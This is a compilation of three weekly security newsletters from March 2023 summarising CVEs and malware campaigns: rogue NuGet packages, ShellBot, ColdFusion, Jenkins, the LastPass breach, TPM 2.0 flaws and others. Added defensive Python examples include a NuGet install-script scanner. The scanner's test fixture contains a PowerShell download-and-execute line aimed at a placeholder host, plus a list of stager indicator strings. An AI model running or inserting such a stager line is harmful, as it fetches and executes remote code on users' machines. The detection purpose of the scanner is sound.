
Programmer’s Digest #24

03/16/2023-03/23/2023 Rogue NuGet Packages Infect .NET Developers, New ShellBot DDoS Malware Variants, Adobe ColdFusion Vulnerability Exploited in the Wild And More

1. CISA Alerts on Critical Security Vulnerabilities in Industrial Control Systems

CISA has released eight Industrial Control Systems (ICS) advisories, warning of critical flaws affecting equipment from Delta Electronics and Rockwell Automation. This includes 13 security vulnerabilities in Delta Electronics’ InfraSuite Device Master, a real-time device monitoring software. All versions prior to 1.0.5 are affected by the issues. Successful exploitation of these vulnerabilities could allow an unauthenticated attacker to obtain access to files and credentials, escalate privileges, and remotely execute arbitrary code. At the top of the list is CVE-2023-1133 (CVSS score: 9.8), a critical flaw that arises from the fact that InfraSuite Device Master accepts unverified UDP packets and deserializes the content, thereby allowing an unauthenticated remote attacker to execute arbitrary code.
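The CVE-2023-1133 description points at two separate defects: packets are accepted without verification, and their content is then deserialized. The following is an added example, not code from Delta Electronics or CISA, of a UDP telemetry receiver that does neither: every datagram carries an HMAC-SHA256 tag that is checked before anything is parsed, and the body is plain JSON validated against a fixed field whitelist rather than a deserializer that can instantiate arbitrary objects. The wire format (32-byte tag followed by a JSON body), the pre-shared key, and the field names are assumptions for the demo.

```python
"""Added example (not the vendor's code): authenticate-then-parse for a UDP datagram.
Wire format assumed for the demo: HMAC-SHA256(tag) || JSON body."""
import hashlib
import hmac
import json

TAG_LEN = 32          # HMAC-SHA256 tag prepended to every datagram (assumed format)
MAX_BODY = 512        # upper bound on the JSON body; anything larger is dropped unread

# The only fields the receiver will accept, with the exact type each must have.
SCHEMA = {"device_id": str, "temp_c": float, "seq": int}


class RejectedPacket(ValueError):
    """Raised for any datagram that fails authentication or validation."""


def build_packet(key: bytes, fields: dict) -> bytes:
    """Sender side: compact JSON body prefixed with an HMAC over that body."""
    body = json.dumps(fields, separators=(",", ":")).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return tag + body


def parse_packet(key: bytes, datagram: bytes) -> dict:
    """Receiver side: verify the tag before parsing, then parse with a whitelist."""
    # 1. Length sanity check before touching the content at all.
    if len(datagram) < TAG_LEN + 2 or len(datagram) > TAG_LEN + MAX_BODY:
        raise RejectedPacket("bad length")
    tag, body = datagram[:TAG_LEN], datagram[TAG_LEN:]
    # 2. Authenticate; compare_digest avoids timing leaks on the tag comparison.
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise RejectedPacket("authentication failed")
    # 3. Parse with a data-only format (JSON), never pickle/marshal/eval on the wire.
    try:
        obj = json.loads(body)
    except ValueError:
        raise RejectedPacket("malformed body")
    # 4. Structural validation: exactly the expected fields, each of the expected type.
    if not isinstance(obj, dict) or set(obj) != set(SCHEMA):
        raise RejectedPacket("unexpected fields")
    for name, typ in SCHEMA.items():
        if type(obj[name]) is not typ:      # `is`, so bool is not accepted as int
            raise RejectedPacket(f"field {name} has wrong type")
    return obj


def vet(key: bytes, datagram: bytes):
    """Convenience wrapper returning (parsed fields or None, reason)."""
    try:
        return parse_packet(key, datagram), "ok"
    except RejectedPacket as exc:
        return None, str(exc)


if __name__ == "__main__":
    key = b"constructed-demo-key"
    good = build_packet(key, {"device_id": "ups-1", "temp_c": 21.5, "seq": 7})
    print(vet(key, good))                      # parsed fields, "ok"
    print(vet(key, good[:-2] + b"8}"))         # tampered body -> authentication failed
    print(vet(key, b"\x80\x04pickle"))         # unauthenticated blob -> bad length
```

Note the ordering: the tag is checked over the raw bytes, so a forged or modified datagram is rejected before the parser ever sees it, and the parser itself is one that cannot execute code regardless of input.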

2. Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware

The NuGet repository is the target of a new “sophisticated and highly-malicious attack” aiming to infect .NET developer systems with cryptocurrency stealer malware. The 13 rogue packages, which were downloaded more than 160,000 times over the past month, have since been taken down. The packages contained a PowerShell script that would execute upon installation and trigger a download of a ‘second stage’ payload, which could be remotely executed. Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API – alone accounted for 166,000 downloads, although it’s also possible that the threat actors artificially inflated the download counts using bots to make them appear more legitimate. The use of Coinbase and Discord underscores the continued reliance on typosquatting techniques, in which fake packages are assigned names that are similar to legitimate packages, in order to trick developers into downloading them. 
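Because the payload here rode on a PowerShell script that runs at install time, a package-intake check can look for exactly that artefact. The following is an added example, not code from the researchers or from NuGet: it opens a .nupkg (a ZIP archive) in memory, lists the conventional install-time scripts under tools/ (init.ps1, install.ps1, uninstall.ps1), and reports download-and-execute indicator strings found in them. The two sample packages are constructed inline; the indicator list and the three-way verdict are assumptions for the demo, not a detection standard.

```python
"""Added example (not NuGet's or the researchers' code): flag install-time
PowerShell in a .nupkg and report stager-like indicators inside it."""
import io
import re
import zipfile

# NuGet runs these from tools/ during installation (init.ps1 in the Package Manager Console).
INSTALL_SCRIPTS = re.compile(r"^tools/(init|install|uninstall)\.ps1$", re.IGNORECASE)

# Strings typical of download-and-execute stagers; these are indicators, not proof.
INDICATORS = [
    "Invoke-Expression", "IEX", "DownloadString", "DownloadFile", "Net.WebClient",
    "Invoke-WebRequest", "-EncodedCommand", "FromBase64String", "Start-Process",
]


def scan_nupkg(nupkg_bytes: bytes) -> list:
    """Return one finding per install-time script: its path and the indicators it contains."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(nupkg_bytes)) as archive:
        for name in archive.namelist():
            if not INSTALL_SCRIPTS.match(name.replace("\\", "/")):
                continue
            text = archive.read(name).decode("utf-8", errors="replace")
            lowered = text.lower()
            hits = sorted({ind for ind in INDICATORS if ind.lower() in lowered})
            findings.append({"script": name, "indicators": hits, "lines": len(text.splitlines())})
    return findings


def classify(nupkg_bytes: bytes) -> str:
    """'block' if a script shows stager indicators, 'review' if any install script exists, else 'clean'."""
    findings = scan_nupkg(nupkg_bytes)
    if any(f["indicators"] for f in findings):
        return "block"
    return "review" if findings else "clean"


def build_nupkg(files: dict) -> bytes:
    """Construct a minimal .nupkg in memory (constructed sample data, not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for path, content in files.items():
            archive.writestr(path, content)
    return buf.getvalue()


# Constructed samples. The hostname uses the reserved .invalid TLD and resolves nowhere.
SUSPICIOUS_NUPKG = build_nupkg({
    "Example.Wrapper.nuspec": "<package />",
    "lib/netstandard2.0/Example.Wrapper.dll": b"MZ placeholder",
    "tools/init.ps1": (
        "param($installPath, $toolsPath, $package, $project)\n"
        "$u = 'http://stage2.example.invalid/p'\n"
        "IEX ((New-Object Net.WebClient).DownloadString($u))\n"
    ),
})
BENIGN_NUPKG = build_nupkg({
    "Example.Lib.nuspec": "<package />",
    "lib/netstandard2.0/Example.Lib.dll": b"MZ placeholder",
})
REVIEW_NUPKG = build_nupkg({
    "Example.Tool.nuspec": "<package />",
    "tools/install.ps1": "Write-Host 'Thanks for installing Example.Tool'\n",
})

if __name__ == "__main__":
    for label, pkg in [("suspicious", SUSPICIOUS_NUPKG), ("benign", BENIGN_NUPKG), ("review", REVIEW_NUPKG)]:
        print(label, classify(pkg), scan_nupkg(pkg))
```

A package with any install-time script is worth a human look even without indicators, which is why the verdict distinguishes "review" from "block"; the indicator list is deliberately short and should be tuned to the environment rather than treated as complete.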

3. New ShellBot DDoS Malware Variants Targeting Poorly Managed Linux Servers

A new cyber attack campaign is targeting poorly managed Linux SSH servers using a malware called ShellBot. This DDoS Bot malware is written in Perl and communicates via IRC protocol. Hackers use scanner malware to identify servers with open SSH port 22 and weak credentials. They then initiate a dictionary attack using a list of known SSH credentials to breach the server and install the ShellBot payload. Once installed, ShellBot communicates with a remote server via IRC protocol, allowing it to carry out DDoS attacks and exfiltrate data. The attack campaign involves three different ShellBot versions, with the first two offering various DDoS attack commands using HTTP, TCP, and UDP protocols. The third version, PowerBots, offers backdoor-like capabilities such as granting reverse shell access and uploading arbitrary files from the compromised host. If ShellBot is installed, Linux servers can be used as DDoS bots to attack specific targets after receiving commands from the attackers.
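The initial access described here, a dictionary attack against SSH, leaves a very recognisable trail in OpenSSH logs: a burst of "Failed password" lines from one address, sometimes followed by an "Accepted password" from the same address. The following is an added example, not code from the ShellBot report: a detector that parses auth.log-style lines, applies a sliding window per source address, and escalates when a success follows the burst. The log lines are constructed, and the threshold (5 failures) and window (60 seconds) are assumptions to be tuned per environment.

```python
"""Added example (not from the ShellBot analysis): SSH password-guessing detection
over OpenSSH auth.log lines. Sample lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH "Failed password"/"Accepted password" lines in classic syslog layout.
SSH_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<kind>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: one address guessing five accounts in six seconds and then
# succeeding; a second address with two isolated failures hours apart.
SAMPLE_LOG = """\
Mar 20 02:14:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.9 port 51422 ssh2
Mar 20 02:14:03 host sshd[1203]: Failed password for root from 203.0.113.9 port 51430 ssh2
Mar 20 02:14:04 host sshd[1205]: Failed password for invalid user test from 203.0.113.9 port 51438 ssh2
Mar 20 02:14:06 host sshd[1207]: Failed password for invalid user oracle from 203.0.113.9 port 51444 ssh2
Mar 20 02:14:07 host sshd[1209]: Failed password for root from 203.0.113.9 port 51450 ssh2
Mar 20 02:14:09 host sshd[1211]: Accepted password for root from 203.0.113.9 port 51456 ssh2
Mar 20 02:30:00 host sshd[1300]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Mar 20 09:30:00 host sshd[1400]: Failed password for alice from 198.51.100.4 port 40001 ssh2
"""


def parse_events(log_text: str) -> list:
    """Turn matching lines into (timestamp, ip, user, kind) tuples; other lines are ignored."""
    events = []
    for line in log_text.splitlines():
        m = SSH_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # syslog has no year
        events.append((ts, m.group("ip"), m.group("user"), m.group("kind")))
    return events


def detect_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60) -> list:
    """Flag source addresses with >= threshold failures inside any window_s-second window.
    Each finding also records whether a successful login followed the burst."""
    by_ip = defaultdict(list)
    for ev in parse_events(log_text):
        by_ip[ev[1]].append(ev)

    findings = []
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [e for e in evs if e[3] == "Failed"]
        burst_end = None
        start = 0
        for i, e in enumerate(fails):
            # Slide the window start forward until it is within window_s of this failure.
            while (e[0] - fails[start][0]).total_seconds() > window_s:
                start += 1
            if i - start + 1 >= threshold:
                burst_end = e[0]
                break
        if burst_end is None:
            continue
        success_after = any(e[3] == "Accepted" and e[0] >= burst_end for e in evs)
        findings.append({
            "ip": ip,
            "failures": len(fails),
            "users": sorted({e[2] for e in fails}),
            "success_after_burst": success_after,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_LOG):
        print(finding)
```

A "success_after_burst" finding is the one to page on: it means the guessing worked, and the host should be treated as compromised rather than merely probed. The same pattern, a per-source sliding window plus a success-after-failures rule, transfers directly to SIEM query languages.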

4. CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 added a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The critical flaw in question is CVE-2023-26360 (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution. Adobe ColdFusion contains an improper access control vulnerability that allows for remote code execution. It’s worth noting that CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations, both of which are no longer supported by the software company as they have reached end-of-life (EoL). While the exact details surrounding the nature of the attacks are unknown, Adobe said in an advisory that it’s aware of the flaw being “exploited in the wild in very limited attacks.”

5. New GoLang-Based HinataBot Exploiting Router and Server Flaws for DDoS Attacks

A new Golang-based botnet dubbed HinataBot has been observed to leverage known flaws to compromise routers and servers and use them to stage distributed denial-of-service (DDoS) attacks. Among the methods used to distribute the malware are the exploitation of exposed Hadoop YARN servers and security flaws in Realtek SDK devices (CVE-2014-8361) and Huawei HG532 routers (CVE-2017-17215, CVSS score: 8.8). The malware, like other DDoS botnets of its kind, is capable of contacting a command-and-control (C2) server to listen for incoming instructions and initiate attacks against a target IP address for a specified duration.
The findings also come as Microsoft revealed that TCP attacks emerged as the most frequent form of DDoS attack encountered in 2022, accounting for 63% of all attack traffic, followed by UDP floods and amplification attacks (22%), and packet anomaly attacks (15%).

6. NordVPN Open Sources Its Linux VPN Client And Libraries

Nord Security has released the source code of its Linux NordVPN client and networking libraries to increase transparency and address users’ security concerns. As part of this, the company has made its NordVPN MeshNet private tunneling feature free for all users who install their software, even if they do not have a paid subscription. This feature allows users to create private tunnels with other NordVPN users to access the internet through the shared network or reach internal devices. NordVPN has released the source code for its Linux applications and two libraries, Libtelio and Libdrop, on its GitHub page, encouraging the coding community to scrutinize and improve its code. The company also offers a bug bounty program, with critical vulnerabilities receiving bounties ranging from $10,000 to $50,000.

7. SAP Releases Security Updates Fixing Five Critical Vulnerabilities

Software vendor SAP has released security updates for 19 vulnerabilities, five rated as critical, meaning that administrators should apply them as soon as possible to mitigate the associated risks. The flaws fixed this month impact many products, but the critical severity bugs affect SAP Business Objects Business Intelligence Platform (CMC) and SAP NetWeaver.
More specifically, the five flaws fixed this time are the following:

  • CVE-2023-23857: Critical severity (CVSS v3: 9.8) information disclosure, data manipulation, and DoS flaw impacting SAP NetWeaver AS for Java, version 7.50. The bug allows an unauthenticated attacker to perform unauthorized operations by attaching to an open interface and accessing services via the directory API.
  • CVE-2023-25616: Critical severity (CVSS v3: 9.9) code injection vulnerability in SAP Business Intelligence Platform, allowing an attacker to access resources only available to privileged users.
  • CVE-2023-27269: Critical severity (CVSS v3: 9.6) directory traversal problem impacting SAP NetWeaver Application Server for ABAP.
  • CVE-2023-27500: Critical severity (CVSS v3: 9.6) directory traversal in SAP NetWeaver AS for ABAP.
  • CVE-2023-25617: Critical severity (CVSS v3: 9.0) command execution vulnerability in SAP Business Objects Business Intelligence Platform, versions 420 and 430.

Programmer’s Digest #23

03/08/2023-03/15/2023. Jenkins Security Alert, IceFire Ransomware Exploits IBM Aspera Faspex, Actively Exploited Plex Bug After LastPass Breach And More.

1. New Critical Flaw in FortiOS and FortiProxy Could Give Hackers Remote Access

Fortinet has released fixes to address 15 security flaws, including one critical vulnerability impacting FortiOS and FortiProxy that could enable a threat actor to take control of affected systems. The issue, tracked as CVE-2023-25610, is rated 9.3 out of 10 for severity and was internally discovered and reported by its security teams. A buffer underwrite (‘buffer underflow’) vulnerability in the FortiOS and FortiProxy administrative interface may allow a remote unauthenticated attacker to execute arbitrary code on the device and/or perform a DoS on the GUI, via specifically crafted requests. Underflow bugs, also called buffer underruns, occur when the input data is shorter than the reserved space, causing unpredictable behavior or leakage of sensitive data from memory. Other possible consequences include memory corruption that could either be weaponized to induce a crash or execute arbitrary code. Fixes are available in FortiOS versions 6.2.13, 6.4.12, 7.0.10, 7.2.4, and 7.4.0; FortiOS-6K7K versions 6.2.13, 6.4.12, and 7.0.10; and FortiProxy versions 2.0.12, 7.0.9, and 7.0.9.

2. Jenkins Security Alert: New Security Flaws Could Allow Code Execution Attacks

A pair of severe security vulnerabilities have been disclosed in the Jenkins open source automation server that could lead to code execution on targeted systems. The flaws, tracked as CVE-2023-27898 and CVE-2023-27905, impact the Jenkins server and Update Center, and have been collectively christened CorePlague by cloud security firm Aqua. All Jenkins versions prior to 2.319.2 are vulnerable and exploitable. Exploiting these vulnerabilities could allow an unauthenticated attacker to execute arbitrary code on the victim’s Jenkins server, potentially leading to a complete compromise of the Jenkins server. Once the victim opens the ‘Available Plugin Manager’ on their Jenkins server, the XSS is triggered, allowing attackers to run arbitrary code on the Jenkins server using the Script Console API. Since it’s also a case of stored XSS, wherein the JavaScript code is injected into the server, the vulnerability can be activated without having to install the plugin or even visit the URL of the plugin in the first place.

3. Hackers Exploiting Remote Desktop Software Flaws to Deploy PlugX Malware

Sunlogin and AweSun remote desktop programs have security vulnerabilities that are being exploited by threat actors to deploy the PlugX malware. AhnLab Security Emergency Response Center (ASEC) reported that this marks the continued abuse of the flaws to deliver various payloads, including the Sliver post-exploitation framework, XMRig cryptocurrency miner, Gh0st RAT, and Paradise ransomware. PlugX is the latest addition to this list. The backdoor is notable for its ability to start arbitrary services, download and execute files from an external source, and drop plugins that can harvest data and propagate using Remote Desktop Protocol (RDP). “New features are being added to [PlugX] even to this day as it continues to see steady use in attacks,” ASEC said.

4. IceFire Ransomware Exploits IBM Aspera Faspex to Attack Linux-Powered Enterprise Networks

IceFire ransomware, which was previously known to target Windows-based systems, has shifted its focus towards Linux enterprise networks. Cybersecurity company SentinelOne reported that the ransomware is exploiting a recently disclosed vulnerability in IBM Aspera Faspex file-sharing software (CVE-2022-47986) to carry out the intrusions. The attacks have primarily targeted media and entertainment organizations in Turkey, Iran, Pakistan, and the U.A.E. The ransomware binary targeting Linux is capable of avoiding encrypting certain paths, allowing the infected machine to continue functioning. Linux systems are typically more difficult to deploy ransomware against, but actors are turning to exploiting application vulnerabilities to overcome this challenge. Meanwhile, Fortinet FortiGuard Labs has disclosed a new LockBit ransomware campaign using “evasive tradecraft” to bypass MotW protections. 

5. CISA Warns Of Actively Exploited Plex Bug After LastPass Breach

CISA has added a three-year-old remote code execution (RCE) vulnerability in Plex Media Server to its list of security flaws exploited in attacks. CVE-2020-5741 allows attackers with admin privileges to execute arbitrary Python code remotely without user interaction. The vulnerability was patched with the release of Plex Media Server 1.19.3 in May 2020. The attack involves exploiting the Camera Upload feature by setting the server data directory to overlap with the content location for a library on which Camera Upload was enabled. CISA did not provide any details on the attacks. However, this could be related to the recent LastPass data breach after a third-party media software RCE bug was abused to install a keylogger on a senior DevOps engineer’s computer, leading to the theft of credentials and critical backups.

6. New GoBruteforcer Malware Targets phpMyAdmin, MySQL, FTP, Postgres

GoBruteforcer is a new Golang-based botnet malware that targets web servers running phpMyAdmin, MySQL, FTP, and Postgres services. Once it detects an open port accepting connections, it attempts to log in using hard-coded credentials and deploys an IRC bot on compromised phpMyAdmin systems or a PHP web shell on other targeted services. It then reaches out to its command-and-control server and waits for instructions that will be delivered via the previously installed IRC bot or web shell. The botnet uses a multiscan module to find potential victims within a Classless Inter-Domain Routing (CIDR) block, which grants it a broad selection of targets to infiltrate networks. GoBruteforcer is likely under active development, and its operators are expected to adapt their tactics and capabilities for targeting web servers and to stay ahead of security defenses.

7. New Version of Prometei Botnet Infects Over 10,000 Systems Worldwide

An updated version of a botnet malware called Prometei has infected more than 10,000 systems worldwide. Prometei, first observed in 2016, is a modular botnet that features a large repertoire of components and several proliferation methods, some of which also include the exploitation of ProxyLogon Microsoft Exchange Server flaws. The cross-platform botnet’s motivations are financial, primarily leveraging its pool of infected hosts to mine cryptocurrency and harvest credentials. The latest variant of Prometei (called v3) improves upon its existing features to challenge forensic analysis and further burrow its access on victim machines. The attack sequence proceeds thus: Upon gaining a successful foothold, a PowerShell command is executed to download the botnet malware from a remote server. Prometei’s main module is then used to retrieve the actual crypto-mining payload and other auxiliary components on the system. Some of these support modules function as spreader programs designed to propagate the malware through Remote Desktop Protocol (RDP), Secure Shell (SSH), and Server Message Block (SMB).


Programmer’s Digest #22

03/02/2023-03/08/2023. 3 New Flaws Threatening IT Management Systems, Info Stealer and Trojan in Python Package, LastPass Hack, New Flaws in TPM 2.0 Library And More

1. CISA’s KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

CISA has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The list of vulnerabilities is below:

  • CVE-2022-35914 (CVSS score: 9.8) – Teclib GLPI Remote Code Execution Vulnerability
  • CVE-2022-33891 (CVSS score: 8.8) – Apache Spark Command Injection Vulnerability
  • CVE-2022-28810 (CVSS score: 6.8) – Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability

The most critical of the three is CVE-2022-35914, which concerns a remote code execution vulnerability in the third-party library htmlawed present in Teclib GLPI, an open source asset and IT management software package. In October 2022, Shadowserver Foundation noted exploitation attempts against its honeypots. VulnCheck researcher Jacob Baines said a cURL-based PoC and a “mass” scanner were available on GitHub. GreyNoise found 40 malicious IP addresses abusing the shortcoming. The Zerobot botnet exploited an unauthenticated command injection vulnerability in Apache Spark for DDoS attacks. Also added to the KEV catalog is a remote code execution flaw in Zoho ManageEngine ADSelfService Plus that was patched in April 2022; Rapid7 detected active exploitation attempts by threat actors. Separately, Wallarm found ongoing exploit attempts against two VMware NSX Manager flaws.

2. Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI

A malicious Python package uploaded to the Python Package Index (PyPI) has been found to contain a fully-featured information stealer and remote access trojan. The package, named colourfool, was identified by Kroll’s Cyber Threat Intelligence team, with the company calling the malware Colour-Blind. The ‘Colour-Blind’ malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. colourfool, like other rogue Python modules discovered in recent months, conceals its malicious code in the setup script, which points to a ZIP archive payload hosted on Discord. The file contains a Python script (code.py) that comes with different modules designed to log keystrokes, steal cookies, and even disable security software. The ‘Colour-Blind’ trojan uses a Flask web application to establish remote control via Cloudflare, according to researchers. It is written almost entirely in Python, unlike the PowerShell-dependent poweRAT. The malware steals passwords, takes screenshots and logs keystrokes. Attackers are now publishing malware as Python packages, while others have deployed Rust executables to drop additional malware. “The risk/reward proposition for attackers is well worth the relatively minuscule time and effort,” the researchers said.

3. LastPass Hack: Engineer’s Failure to Update Plex Software Led to Massive Data Breach

LastPass’s recent data breach occurred due to an engineer failing to update the Plex media software package on their home computer, highlighting the dangers of not keeping software up-to-date. The password management service revealed that an unidentified party used information stolen in an earlier incident and data from a third-party breach to launch a coordinated attack on the cloud storage environment, stealing encrypted password vault data and customer information. The attackers targeted one of four DevOps engineers, exploiting a now-patched flaw in Plex Media Server, CVE-2020-5741, to execute arbitrary Python code on the engineer’s computer and install keylogger malware. Unfortunately, the engineer had not updated their software, so the fix was never in place on that machine. Plex released version 1.19.3.2764, which addressed the exploit, in May 2020.

4. New Flaws in TPM 2.0 Library Pose Threat to Billions of IoT and Enterprise Devices

Serious security flaws have been identified in the Trusted Platform Module (TPM) 2.0 reference library specification, which could potentially result in information disclosure or privilege escalation. Cybersecurity company Quarkslab discovered the vulnerabilities in November 2022. One vulnerability involves an out-of-bounds write, while the other concerns an out-of-bounds read. Large tech vendors and organizations that use enterprise computers, servers, IoT devices, and embedded systems that include a TPM can be impacted by the flaws, potentially affecting billions of devices. TPM is a hardware-based solution designed to provide secure cryptographic functions and physical security mechanisms to resist tampering. The flaws result from a lack of necessary length checks, leading to buffer overflows that could enable local information disclosure or privilege escalation. Users are urged to apply the updates released by TCG and other vendors to address the flaws and mitigate supply chain risks.
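The root cause named here, a missing length check on a size-prefixed buffer, is the classic TPM2B parsing mistake: the TPM 2.0 wire format carries many structures as a 16-bit big-endian size followed by that many bytes, and code that trusts the size field without comparing it to both the structure's declared maximum and the bytes actually remaining reads or writes out of bounds. The following is an added example, not code from the TCG reference library or from Quarkslab: a small parser for a sequence of such size-prefixed fields that performs both checks before copying. The per-field maximum sizes and the sample buffers are assumptions for the demo; the field layout is generic rather than any specific TPM command.

```python
"""Added example (not the TCG reference code): bounds-checked parsing of
TPM2B-style size-prefixed fields (UINT16 big-endian size, then `size` bytes)."""
import struct


class MalformedBuffer(ValueError):
    """Raised when a size field is inconsistent with the bytes actually present."""


def read_tpm2b(buf: bytes, offset: int, max_size: int):
    """Read one size-prefixed field starting at `offset`.

    Two checks stand between the untrusted size field and any memory access:
    the size must not exceed the structure's declared maximum (the check the
    advisory describes as missing), and the field must fit inside the bytes
    that were really received. Returns (field_bytes, next_offset)."""
    if offset + 2 > len(buf):
        raise MalformedBuffer("truncated size field")
    (size,) = struct.unpack_from(">H", buf, offset)
    if size > max_size:
        raise MalformedBuffer(f"size {size} exceeds maximum {max_size}")
    start, end = offset + 2, offset + 2 + size
    if end > len(buf):
        raise MalformedBuffer(f"size {size} runs past end of buffer ({len(buf)} bytes)")
    return buf[start:end], end


def parse_fields(buf: bytes, max_sizes: list) -> list:
    """Parse consecutive size-prefixed fields; `max_sizes[i]` bounds field i.
    Trailing bytes are rejected so a truncated-then-padded message cannot slip through."""
    fields, offset = [], 0
    for max_size in max_sizes:
        value, offset = read_tpm2b(buf, offset, max_size)
        fields.append(value)
    if offset != len(buf):
        raise MalformedBuffer(f"{len(buf) - offset} trailing bytes")
    return fields


def is_malformed(buf: bytes, max_sizes: list) -> bool:
    """True if the parser rejects the buffer; handy for tests and fuzz triage."""
    try:
        parse_fields(buf, max_sizes)
        return False
    except MalformedBuffer:
        return True


if __name__ == "__main__":
    # Constructed inputs: a well-formed two-field message and three malformed ones.
    print(parse_fields(b"\x00\x03abc\x00\x02xy", [64, 64]))   # [b'abc', b'xy']
    for bad in (b"\x10\x00abc",        # claims 4096 bytes, declared maximum is 64
                b"\x00\x05abc",        # claims 5 bytes, only 3 present
                b"\x00\x03abcZ"):      # well-formed field followed by a stray byte
        print(bad, "->", is_malformed(bad, [64]))
```

The second check is the one that a bound against the declared maximum alone does not cover: a size within the spec-defined limit can still exceed what was received. Both comparisons are needed on every size field, on every nesting level.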

5. SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics

The Lucky Mouse threat actor has created a Linux version of its malware toolkit SysUpdate, enabling the group to target devices running on the operating system. The updated version dates back to July 2022 and includes new features to evade security software and resist reverse engineering. Lucky Mouse, also known as APT27, Bronze Union, Emissary Panda, and Iron Tiger, uses a variety of malware, including HyperBro, PlugX, and a Linux backdoor called rshell. The group’s campaigns have involved supply chain compromises of legitimate apps to gain remote access to compromised systems. The recent campaign targeted a gambling company in the Philippines using installers masquerading as messaging apps to activate the attack sequence. The Windows version of SysUpdate features process management, screenshots, file operations, and DNS Tunneling to communicate with C2 servers.

6. Proof-of-Concept Released For Critical Microsoft Word RCE bug

A proof-of-concept for CVE-2023-21716, a critical vulnerability in Microsoft Word that allows remote code execution, has been published over the weekend. The vulnerability was assigned a 9.8 out of 10 severity score. Security researcher Joshua Drake last year discovered the vulnerability in Microsoft Office’s “wwlib.dll” and sent Microsoft a technical advisory containing proof-of-concept (PoC) code showing the issue is exploitable.
A remote attacker could potentially take advantage of the issue to execute code with the same privileges as the victim that opens a malicious .RTF document. Delivering the malicious file to a victim can be as easy as an attachment to an email, although plenty of other methods exist. Microsoft warns that users don’t even have to open a malicious RTF document: simply loading the file in the Preview Pane is enough for the compromise to start. At the moment there is no indication that the vulnerability is being exploited in the wild, and Microsoft’s current assessment is that taking advantage of the issue is “less likely.”

7. BlackLotus Bootkit Bypasses UEFI Secure Boot on Patched Windows 11

The BlackLotus UEFI bootkit has been improved with Secure Boot bypass capabilities that enable it to infect fully patched Windows 11 systems. This malware is the first known public example of UEFI malware that can bypass the Secure Boot mechanism, allowing it to disable security protections in the operating system. The malware could impair the BitLocker data protection feature, Microsoft Defender Antivirus, and the Hypervisor-protected Code Integrity. UEFI is low-level code that executes when a computer powers up and controls the booting sequence before the operating system starts. The malware emerged last year, promoted on hacking forums as virtually invisible to antivirus agents, and has a feature set that allows it to bypass security measures. Security researchers at ESET have confirmed the malware can bypass the Secure Boot mechanism by leveraging a vulnerability tracked as CVE-2022-21894.
